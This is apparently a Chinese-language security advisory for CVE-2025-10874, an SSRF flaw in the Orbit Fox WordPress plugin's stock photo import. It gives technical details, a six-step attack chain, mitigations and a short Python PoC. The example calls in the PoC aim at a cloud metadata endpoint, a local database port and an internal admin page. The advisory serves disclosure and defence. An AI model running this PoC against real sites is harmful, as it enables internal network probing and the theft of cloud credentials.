CVE-2025-10874: WordPress Orbit Fox插件SSRF漏洞

漏洞信息

漏洞编号

CVE-2025-10874

漏洞类型

服务器端请求伪造(SSRF)

CVSS评分

5.5 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Orbit Fox WordPress Plugin (Duplicate Page, Menu Icons, SVG Support, Cookie Notice, Custom Fonts & More)

漏洞概述

Orbit Fox是WordPress平台上一款功能丰富的综合性插件，提供页面复制、菜单图标、SVG支持、Cookie通知、自定义字体等功能。该插件在3.0.2之前的版本中存在严重的服务器端请求伪造(SSRF)漏洞。漏洞根源在于插件的库存照片导入功能未对用户可指定的URL进行任何限制，攻击者可以构造恶意请求，诱导服务器向任意内部或外部URL发起请求。这一漏洞允许具有较高权限的用户(如管理员)利用服务器作为代理，访问内部敏感资源、扫描内网服务或对第三方系统发起攻击。由于该漏洞需要较高权限用户触发，且不影响系统可用性，CVSS评分定为5.5(中危)。建议受影响的用户立即升级到3.0.2或更高版本以修复此安全风险。

技术细节

漏洞存在于Orbit Fox插件的stock photo import(库存照片导入)功能模块中。该功能设计用于允许用户从外部来源导入库存图片，但其实现存在严重的安全缺陷：1) 插件直接接受用户输入的URL参数而未进行有效性验证；2) 未对允许访问的域名或IP范围进行限制；3) 缺少对内部IP地址段(127.0.0.1、10.0.0.0/8、172.16.0.0/12、192.168.0.0/16)的过滤机制。攻击者可通过构造包含内网地址或恶意URL的请求，迫使服务器向目标发起HTTP/HTTPS请求，从而实现端口扫描、内网服务探测、读取本地文件或访问云元数据接口等操作。攻击者可能利用此漏洞绕过网络边界防护，探测内网拓扑结构或获取敏感信息。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的WordPress版本和Orbit Fox插件版本，确认版本小于3.0.2

STEP 2

步骤2: 获取认证

攻击者获取WordPress高权限账户(如管理员)凭据，或通过其他漏洞提升权限至管理员级别

STEP 3

步骤3: 构造恶意请求

攻击者构造包含内网地址或恶意URL的stock photo import请求，设置image_url参数为目标地址

STEP 4

步骤4: 触发SSRF

通过WordPress AJAX端点发送恶意请求，诱导服务器向指定目标发起HTTP/HTTPS请求

STEP 5

步骤5: 探测内网

利用服务器作为代理，扫描内网IP段、端口或访问云服务元数据接口获取敏感信息

STEP 6

步骤6: 数据窃取/横向移动

基于获取的信息进行进一步攻击，如访问内部API、数据库或云资源

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-10874 SSRF PoC
# Target: WordPress site with vulnerable Orbit Fox plugin < 3.0.2

def exploit_ssrf(target_url, internal_target):
    """
    Exploit SSRF vulnerability in Orbit Fox plugin
    target_url: WordPress site URL
    internal_target: Internal IP/URL to target (e.g., http://127.0.0.1:8080)
    """
    
    # WordPress admin endpoint with Orbit Fox stock photo import
    endpoint = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
    
    # Construct SSRF payload
    payload = {
        'action': 'orbitfox_stock_photo_import',
        'image_url': internal_target,  # SSRF payload
        'nonce': 'attacker_controlled_or_leaked_nonce'
    }
    
    try:
        response = requests.post(endpoint, data=payload, timeout=10)
        print(f"[*] Request sent to: {internal_target}")
        print(f"[*] Response Status: {response.status_code}")
        print(f"[*] Response Length: {len(response.content)} bytes")
        return response
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return None

# Example usage:
# exploit_ssrf('http://victim.com', 'http://169.254.169.254/latest/meta-data/')
# exploit_ssrf('http://victim.com', 'http://127.0.0.1:3306')
# exploit_ssrf('http://victim.com', 'http://10.0.0.1:8080/admin')

影响范围

Orbit Fox WordPress Plugin < 3.0.2

防御指南

临时缓解措施

临时缓解措施：1) 在Web应用层配置防火墙规则，阻止对内网地址的出站请求；2) 限制WordPress站点的出站HTTP请求；3) 禁用或限制Orbit Fox插件的stock photo import功能；4) 审查并限制具有管理员权限的账户；5) 监控服务器的外向流量异常。长期解决方案为升级到插件最新版本。